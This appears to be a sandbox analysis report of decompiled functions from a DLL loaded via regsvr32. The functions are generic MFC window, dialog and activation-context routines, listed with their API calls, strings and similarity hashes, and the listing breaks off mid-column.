Uniqueness Score: -1.00%

Function 1000F530, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000F530(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E10012862(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E1000D86F(_t121, E1000D804(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E1000A7CE();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E1000D86F(_t121, E1000D804(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001297A(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

0x1000f530
0x1000f530
0x1000f537
0x1000f53a
0x1000f542
0x1000f545
0x1000f54a
0x1000f558
0x1000f56a
0x1000f55a
0x1000f55d
0x1000f55d
0x1000f570
0x1000f574
0x1000f580
0x1000f588
0x1000f58a
0x1000f58a
0x1000f588
0x1000f54c
0x1000f54c
0x1000f54c
0x1000f54c
0x1000f58c
0x1000f59a
0x1000f5a3
0x1000f643
0x1000f64a
0x1000f651
0x1000f65b
0x1000f5a9
0x1000f5ab
0x1000f5b0
0x1000f5bb
0x1000f5c4
0x1000f5c4
0x1000f5bb
0x1000f5c8
0x1000f5cf
0x1000f610
0x1000f61f
0x1000f62c
0x1000f5d1
0x1000f5d1
0x1000f5d8
0x1000f5da
0x1000f5da
0x1000f5ea
0x1000f5fd
0x1000f607
0x1000f607
0x1000f5cf
0x1000f66a
0x1000f66f
0x1000f674
0x1000f678
0x1000f67b
0x1000f682
0x1000f68a
0x1000f692
0x1000f69a
0x1000f6a1
0x1000f6a6
0x1000f6b2
0x1000f6ba
0x1000f6ba
0x1000f6a8
0x1000f6a8
0x1000f6a8
0x1000f6c0
0x1000f6cf
0x1000f6d7
0x1000f6d7
0x1000f6c2
0x1000f6c2
0x1000f6c2
0x1000f6ef

APIs

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

GetParent.USER32(?), ref: 1000F55D
SendMessageA.USER32 ref: 1000F580
GetWindowRect.USER32 ref: 1000F59A
GetWindowLongA.USER32 ref: 1000F5B0
CopyRect.USER32 ref: 1000F5FD
CopyRect.USER32 ref: 1000F607
GetWindowRect.USER32 ref: 1000F610
CopyRect.USER32 ref: 1000F62C

Strings

(, xrefs: 1000F5C8

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
Instruction ID: 3f3129d87232bc90929dbfd76231b55f7e5f3d8dd267dcccc126c4261812b80e
Opcode Fuzzy Hash: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
Instruction Fuzzy Hash: 84517072900619AFEB00DFA8CC85EEEBBB9EF48290F154119FA05F3594DB30ED419B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000A1F9, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A1F9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10058f2c; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E1000A0DB(0, _t12, _t15, _t16, _t20);
					}
					 *0x10058f1c = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10058f20 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10058f24 = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10058f1c; // 0x0
					 *0x10058f28 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10058f20; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10058f24; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10058f20; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10058f24; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10058f2c = 1;
				}
				return _t18;
			}

0x1000a1f9
0x1000a1f9
0x1000a1ff
0x1000a203
0x1000a206
0x1000a209
0x1000a210
0x1000a221
0x1000a223
0x1000a225
0x1000a227
0x1000a227
0x1000a227
0x1000a241
0x1000a24e
0x1000a25b
0x1000a260
0x1000a262
0x1000a268
0x1000a26d
0x1000a26e
0x1000a286
0x1000a28c
0x00000000
0x1000a28e
0x1000a28e
0x1000a294
0x00000000
0x1000a296
0x1000a296
0x1000a298
0x00000000
0x00000000
0x1000a298
0x1000a294
0x1000a270
0x1000a270
0x1000a276
0x00000000
0x1000a278
0x1000a278
0x1000a27e
0x00000000
0x1000a280
0x1000a280
0x1000a282
0x00000000
0x1000a284
0x1000a282
0x1000a27e
0x1000a276
0x1000a29a
0x1000a29a
0x1000a2a6

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1000ACB1,000000FF), ref: 1000A21B
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 1000A239
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1000A246
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 1000A253
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1000A260

Strings

ActivateActCtx, xrefs: 1000A248
DeactivateActCtx, xrefs: 1000A255
ReleaseActCtx, xrefs: 1000A23B
KERNEL32, xrefs: 1000A216
CreateActCtxA, xrefs: 1000A233

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
Instruction ID: c20c66116e7296d4a0afd5037f2dffc74684b1862cb446d2da729e570b87d5d5
Opcode Fuzzy Hash: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
Instruction Fuzzy Hash: 3611C076C04266EBFB10DFA9ACC45097BE5E74F2D8301423FEA05A2124D7720980CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB74, Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CB74(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E10017BF4(E10028029, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1000D5EC(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E1000D5EC(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E1000C6AC(_t84, _t100, __eflags);
					E1000FC04(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E1000A7CE();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E100128F8(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E10012913(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E100115DC(_t96, __eflags, _t100);
					_t58 = E1000FB5C(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E1000C984(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E10012862(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E1000F6F2(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E1001297A(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E10012913(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E1000C6E6(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E10017C60(_t63);
				}
			}

0x1000cb74
0x1000cb74
0x1000cb74
0x1000cb7b
0x1000cb80
0x1000cb82
0x1000cb88
0x1000cb8e
0x1000cb91
0x1000cb96
0x1000cb99
0x1000cb9b
0x1000cb9e
0x1000cba5
0x1000cbb6
0x1000cbbc
0x1000cbbc
0x1000cbc2
0x1000cbc7
0x1000cbcd
0x1000cbcd
0x1000cbd3
0x1000cbdd
0x1000cbe4
0x1000cbe7
0x1000cbec
0x1000cbef
0x1000cbf2
0x1000cbf5
0x1000cbf8
0x1000cc00
0x1000cc03
0x1000cc0e
0x1000cc10
0x1000cc17
0x1000cc1d
0x1000cc29
0x1000cc2b
0x1000cc2d
0x1000cc30
0x1000cc34
0x1000cc3c
0x1000cc3e
0x1000cc40
0x1000cc47
0x1000cc49
0x1000cc4d
0x1000cc4f
0x1000cc54
0x1000cc54
0x1000cc49
0x1000cc3e
0x1000cc30
0x1000cc10
0x1000cc03
0x1000cc5b
0x1000cc60
0x1000cc68
0x1000cc6d
0x1000cc6e
0x1000cc6f
0x1000cc74
0x1000cc79
0x1000cc7b
0x1000cc7d
0x1000cc7f
0x1000cc83
0x1000cc87
0x1000cc8a
0x1000cc8f
0x1000cc93
0x1000cc97
0x1000cc97
0x1000cc9b
0x1000cca0
0x1000cca0
0x1000cca0
0x1000cca2
0x1000cca5
0x1000ccb3
0x1000ccb3
0x1000cca5
0x1000ccb8
0x1000ccdb
0x1000ccde
0x1000cce4
0x1000cce4
0x1000cce9
0x1000ccec
0x1000ccf3
0x1000ccf3
0x1000ccf9
0x1000ccfc
0x1000cd04
0x1000cd07
0x1000cd0c
0x1000cd0c
0x1000cd07
0x1000cd16
0x1000cd1b
0x1000cd20
0x1000cd23
0x1000cd28
0x1000cd28
0x1000cd2e
0x00000000
0x1000cbd5
0x1000cbd5
0x1000cd31
0x1000cd36
0x1000cd36

APIs

__EH_prolog3_catch.LIBCMT ref: 1000CB7B
FindResourceA.KERNEL32(?,?,00000005), ref: 1000CBAE
LoadResource.KERNEL32(?,00000000), ref: 1000CBB6
LockResource.KERNEL32(?,00000024,100014EC,00000000,7D1A16F8), ref: 1000CBC7
GetDesktopWindow.USER32 ref: 1000CBFA
IsWindowEnabled.USER32(?), ref: 1000CC08
EnableWindow.USER32(?,00000000), ref: 1000CC17

Part of subcall function 100128F8: IsWindowEnabled.USER32(?), ref: 10012901

Part of subcall function 10012913: EnableWindow.USER32(?,7D1A16F8), ref: 10012920

EnableWindow.USER32(?,00000001), ref: 1000CCF3
GetActiveWindow.USER32 ref: 1000CCFE
SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,7D1A16F8), ref: 1000CD0C
FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,7D1A16F8), ref: 1000CD28

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
Instruction ID: 8f78f448105f665873ac1cd7b5fa33a3343bcf420d8a1ae80c8a79bff85a7528
Opcode Fuzzy Hash: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
Instruction Fuzzy Hash: A251BF34A007098BFF11DFA5C999EAEBBF1EF44781F20002EE506A6195CB759E41CF55

Uniqueness

Uniqueness Score: -1.00%

Function 10011245, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10011245(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E10017BF4(E1002864B, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E1000FB5C(1, _t60, _t71,  *(_t71 + 0x14));
					E10011159(_t60, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E100111CF(1, _t66, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E1000E865(E1000FB5C(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E100100F3(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E10017C60( *(_t71 - 0x14));
			}

0x10011245
0x10011245
0x10011245
0x1001124c
0x10011251
0x10011254
0x1001125b
0x10011261
0x10011265
0x10011269
0x10011271
0x10011272
0x10011275
0x1001131e
0x10011330
0x00000000
0x1001127b
0x1001127b
0x1001127e
0x10011316
0x10011335
0x10011337
0x00000000
0x00000000
0x10011280
0x10011280
0x10011283
0x100112dc
0x100112e4
0x100112f2
0x00000000
0x10011285
0x1001128a
0x10011339
0x1001134c
0x10011290
0x100112a1
0x100112be
0x100112c6
0x100112c6
0x1001128a
0x10011283
0x1001127e
0x100112d3

APIs

__EH_prolog3_catch.LIBCMT ref: 1001124C
GetPropA.USER32 ref: 1001125B
CallWindowProcA.USER32 ref: 100112B5

Part of subcall function 100100F3: GetWindowRect.USER32 ref: 1001011B
Part of subcall function 100100F3: GetWindow.USER32(?,00000004), ref: 10010138

SetWindowLongA.USER32(?,000000FC,?), ref: 100112DC
RemovePropA.USER32 ref: 100112E4
GlobalFindAtomA.KERNEL32 ref: 100112EB
GlobalDeleteAtom.KERNEL32 ref: 100112F2

Part of subcall function 1000E865: GetWindowRect.USER32 ref: 1000E871

CallWindowProcA.USER32 ref: 10011346

Strings

AfxOldWndProc423, xrefs: 10011254, 10011259, 100112E2, 100112EA

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
Instruction ID: 0d19250562dc5a9dad551a697ef26f9b08052b09a3581b526b6705a222a2b98b
Opcode Fuzzy Hash: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
Instruction Fuzzy Hash: 2D317F7680021ABBDF05DFA0CD89EFF7FB9FF05651F100118F611A6051DB359A61ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000C984, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000C984(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E10017BF4(E1002800E, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E1000D5EC(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E1000D5EC(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E10012406(_t103, _t104, 0, _t129, _t136, 0x10);
				E10012406(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E10017C60(_t65);
					}
					E10009E23(_t132 - 0x1c, E10013479());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E10014A97(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x1005aa84; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E100115DC(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1000C402, 0);
							E10009CB7( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E1000FC04(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E10014A60(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E100149BE(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E100146D7(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E100146C9(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E1000C95C(_t132 - 0x1c, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

0x1000c984
0x1000c984
0x1000c984
0x1000c984
0x1000c98b
0x1000c990
0x1000c992
0x1000c997
0x1000c99a
0x1000c9a4
0x1000c9a4
0x1000c9ac
0x1000c9b1
0x1000c9b4
0x1000c9b7
0x1000c9ba
0x1000c9c4
0x1000c9cb
0x1000c9f8
0x1000c9fb
0x1000c9fb
0x1000c9fd
0x1000c9df
0x1000c9df
0x1000cb6c
0x1000cb71
0x1000cb71
0x1000ca08
0x1000ca16
0x1000ca1a
0x1000ca27
0x1000ca2c
0x1000ca32
0x1000ca34
0x1000ca6a
0x1000ca6a
0x1000ca6c
0x1000caad
0x1000caad
0x1000cab1
0x1000cab6
0x1000cabb
0x1000cabe
0x1000cac0
0x1000cac6
0x1000cac2
0x1000cac2
0x1000cac2
0x1000cae0
0x1000cae2
0x1000cae7
0x1000cb09
0x1000cb0c
0x1000cb0e
0x1000cb16
0x1000cb19
0x1000cb1b
0x1000cb22
0x1000cb22
0x1000cb1b
0x1000cb28
0x1000cb2d
0x1000cb2f
0x1000cb35
0x1000cb35
0x1000cb3b
0x1000cb3d
